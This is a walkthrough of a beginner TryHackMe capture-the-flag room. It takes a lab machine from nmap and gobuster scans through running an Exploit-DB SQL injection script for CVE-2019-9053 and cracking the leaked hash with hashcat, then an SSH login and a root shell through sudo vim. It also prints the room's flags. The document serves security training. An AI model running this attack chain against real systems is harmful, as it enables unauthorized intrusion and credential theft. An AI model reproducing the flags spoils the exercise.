Understanding CTF TryHackMe
Capture The Flag (CTF) challenges are hands-on cybersecurity exercises where participants solve security tasks to discover hidden "flags"—typically text strings that prove successful exploitation. This walkthrough demonstrates a beginner-level TryHackMe CTF, covering essential penetration testing skills: service identification, vulnerability exploitation, and privilege escalation.
Key Points
- CTF challenges simulate real-world security scenarios for practical learning
- Service scanning with tools like
nmapreveals attack surfaces - Vulnerability research identifies exploitable weaknesses in discovered services
- Privilege escalation techniques elevate access from standard user to root
- Documentation of each step builds a repeatable methodology
Phase 1: Reconnaissance and Service Identification
The first phase of any penetration test involves mapping the target's attack surface through network scanning.
Scanning for Open Services
Use nmap with aggressive scanning to identify running services and their versions:
nmap -A 10.10.82.113
Sample Output:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
Key Findings:
- 2 services running under port 1000 (FTP on port 21, HTTP on port 80)
- SSH service running on the non-standard port 2222
- Apache web server and vsftpd versions identified for vulnerability research
Phase 2: Web Application Discovery
With HTTP service confirmed, enumerate hidden directories to find potential entry points.
Directory Enumeration
Use gobuster to discover hidden web directories:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u 10.10.82.113
Result: The /simple directory hosts CMS Made Simple version 2.2.8
Critical Finding: This CMS version is vulnerable to CVE-2019-9053, a SQL injection vulnerability that can leak credentials.
Phase 3: Exploitation
Understanding the Vulnerability
CVE-2019-9053 is a SQL injection vulnerability in CMS Made Simple 2.2.8 that allows unauthenticated attackers to extract database information, including password hashes and salts.
Vulnerability Type: SQL Injection (SQLi)
Executing the Exploit
Download the exploit from Exploit-DB and execute:
python2 46635.py -u http://10.10.82.113/simple
Extracted Credentials:
[+] Salt: 1dac0d92e9fa6bb2
[+] Username: mitch
[+] Password Hash: 0c01f4468bd75d7a84c7eb73846e8d96
Password Cracking
Use hashcat to crack the salted MD5 hash:
hashcat -O -a 0 -m 20 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 /usr/share/wordlists/rockyou.txt
Cracked Password: secret
Valid Credentials: mitch:secret
Phase 4: Initial Access
SSH Authentication
Connect to the target using the discovered credentials on the non-standard SSH port:
ssh mitch@10.10.82.113 -p 2222
User Flag Retrieval
Once authenticated, locate and read the user flag:
ls
cat user.txt
User Flag: G00d j0b, keep up!
System Enumeration
Identify other users on the system:
cd /home && ls
Additional User Found: sunbath
Phase 5: Privilege Escalation
Identifying Escalation Vectors
Check for sudo permissions assigned to the current user:
sudo -l
Output:
(root) NOPASSWD: /usr/bin/vim
Security Misconfiguration: The user
mitchcan executevimas root without a password—a critical privilege escalation vector.
Exploiting Vim for Root Access
Leverage vim's command execution capability to spawn a root shell:
sudo vim -c ':!/bin/sh'
This command opens vim with root privileges and immediately executes a shell, granting root access.
Root Flag Retrieval
Navigate to the root directory and capture the final flag:
cd /root
cat root.txt
Root Flag: W3ll d0n3. You made it!
CTF Methodology Summary
| Phase | Objective | Key Tools |
|---|---|---|
| Reconnaissance | Identify services and versions | nmap, gobuster |
| Vulnerability Research | Find exploitable weaknesses | CVE databases, Exploit-DB |
| Exploitation | Gain initial access | Custom exploits, hashcat |
| Post-Exploitation | Enumerate system information | ls, sudo -l, find |
| Privilege Escalation | Achieve root access | GTFOBins, misconfiguration abuse |
Best Practices for CTF Success
Systematic Approach:
- Always start with comprehensive reconnaissance
- Document every command and its output
- Research CVEs for all identified software versions
Security Awareness:
- Understand why vulnerabilities exist (e.g., input validation failures)
- Learn defensive measures alongside offensive techniques
- Practice in legal, authorized environments only
Continuous Learning:
- Review writeups from other participants after completing challenges
- Experiment with different tools and techniques
- Build a personal knowledge base of common vulnerabilities
Learn More
Expand your penetration testing skills with these platforms:
| Platform | Focus Area | Best For |
|---|---|---|
| TryHackMe | Guided CTF challenges | Beginners to intermediate |
| Hack The Box | Real-world scenarios | Intermediate to advanced |
| OverTheWire | Linux security fundamentals | Command-line proficiency |
| VulnHub | Downloadable vulnerable VMs | Offline practice |
Additional Resources:
- GTFOBins: Database of Unix binaries for privilege escalation
- PayloadsAllTheThings: Repository of attack payloads and bypasses
- OWASP Top 10: Essential web application security risks
Legal Notice: Only practice penetration testing on systems you own or have explicit written permission to test. Unauthorized access is illegal.